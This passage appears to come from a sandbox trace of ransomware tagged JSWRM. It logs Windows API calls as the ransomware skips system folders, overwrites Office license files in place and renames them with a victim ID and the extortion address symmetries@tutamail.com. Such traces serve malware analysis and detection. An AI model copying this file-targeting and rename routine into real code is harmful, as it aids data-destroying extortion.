office\\root\\licenses16\\proplusr_oem_perp2-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.038] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0109.038] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.038] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.041] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.041] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.041] CloseHandle (hObject=0x45c) returned 1 [0109.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0109.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0109.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0109.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.041] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0109.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0109.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.042] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea38d533, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea38d533, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea472403, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp3-pl.xrm-ms", cAlternateFileName="PRCA0F~1.XRM")) returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2=".") returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="..") returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="...") returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="windows") returned -1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="recovery") returned -1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.043] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-pl.xrm-ms", lpString2="msocache") returned 1 [0109.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0109.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0109.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0109.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0109.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241060, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0109.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0109.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.044] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0109.044] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.044] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.046] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.046] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.046] CloseHandle (hObject=0x45c) returned 1 [0109.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0109.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0109.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0109.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0109.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.047] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0109.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0109.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0109.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0109.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0109.048] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea3673f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea3673f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea425f65, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eef, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp3-ppd.xrm-ms", cAlternateFileName="PR80AA~1.XRM")) returned 1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2=".") returned 1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="..") returned 1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="...") returned 1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="windows") returned -1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.048] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.049] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.049] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0109.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0109.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0109.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240f98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0109.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0109.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.049] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24303) returned 1 [0109.050] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0109.050] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.052] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.053] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.053] CloseHandle (hObject=0x45c) returned 1 [0109.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0109.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0109.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0109.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0109.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0109.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0109.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.053] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0109.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0109.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0109.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0109.054] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea3673f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea3673f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea3d9a66, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", cAlternateFileName="PR9E6A~1.XRM")) returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.054] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0109.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 